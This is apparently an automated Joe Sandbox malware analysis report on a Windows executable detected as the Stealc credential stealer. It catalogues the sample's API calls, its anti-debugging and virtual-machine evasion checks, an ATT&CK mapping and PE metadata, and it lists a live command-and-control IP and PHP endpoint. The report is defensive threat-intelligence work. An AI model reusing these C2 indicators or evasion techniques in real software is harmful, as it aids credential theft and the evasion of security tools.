              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00504B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00504B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00504B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0050CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00502390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00502390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004FDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_004FDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005023A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_005023A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0050D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0050DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0050DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_004F16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004F16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00511BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00511BF0
              Source: file.exe, file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1501268976.0000000001096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
              Source: file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25701
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25546
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25694
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25566
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25590
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004F4A60 VirtualProtect 00000000,00000004,00000100,?0_2_004F4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00516390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00516390 mov eax, dword ptr fs:[00000030h]0_2_00516390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00512A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00512A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00514610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_00514610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005146A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_005146A0
              Source: file.exe, file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: )Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00512D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00512B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00512B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00512A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00512A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00512C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00512C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts12
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php6E100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpBE100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php/Q100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpfE100%Avira URL Cloudmalware
              http://185.215.113.206/V100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php/Qfile.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.php6Efile.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.phpfEfile.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/Vfile.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/ffile.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpBEfile.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.206
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1561397
                      Start date and time:2024-11-23 10:32:12 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 49s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 79%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 122
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206/c4becf79229cb002.php
                      file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                      • 185.215.113.206/

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, CryptbotBrowse
                      • 185.215.113.43
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadey, CryptbotBrowse
                      • 185.215.113.43
                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousLummaC StealerBrowse
                      • 185.215.113.16
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.206
                      file.exeGet hashmaliciousAmadey, CryptbotBrowse
                      • 185.215.113.43

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.943118479213282
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'832'448 bytes
                      MD5:69cbce48a9ce8b1da7a0195ae4dfbccc
                      SHA1:c05a7472201be886b55e2958351df9e211fbe639
                      SHA256:65e88eb9ca629cda57680a4f4f7d0d39fe7dfe7ef80d619b809779e9ecff33ad
                      SHA512:f24c8b12f0d2fd02a4ffcc7d196f96f2c1f8edbe029c5e99133795d8834589b2ad60d27f55fcb3d5887fc818b8bc178298f53dbf43a5cc879aef279e809fa311
                      SSDEEP:49152:xU9+qhQuGyU+eN3agyYmYhIHWpBsfgvGY85PMMvV:xU9HU+EbyJYWHiB3GYkUw
                      TLSH:078533A22E7A3091E27E12B4DE031E9630FE85046E9E5DDA8DD717B1CCB31D23A5D4B4
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xaa0000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FE52C7C883Ah
                      paddq mm3, qword ptr [ebx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], bl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      or al, byte ptr [eax]
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [ecx], al
                      or al, byte ptr [eax]
                      add byte ptr [ebx], cl
                      or al, byte ptr [eax]
                      add byte ptr [ecx], cl
                      or al, byte ptr [eax]
                      add byte ptr [edx], cl
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dl
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

